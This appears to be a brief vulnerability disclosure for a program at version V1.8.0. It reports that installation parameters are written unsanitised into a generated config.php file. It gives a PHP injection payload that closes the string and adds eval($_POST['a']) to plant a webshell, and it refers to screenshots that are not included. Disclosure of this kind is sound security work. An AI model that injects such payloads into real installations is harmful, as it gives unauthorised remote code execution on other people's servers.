There are vulnerabilities in program V1.8.0
The vulnerability is located in the image below

The loophole is in these two parameters, which can be written directly to the Webshell at installation time by constructing a specific payload
payload:test.com');eval($_POST['a']);//
After payload is written, a config.php file is automatically generated. The parentheses close and the webshell can be accessed

The following figure shows the webshell result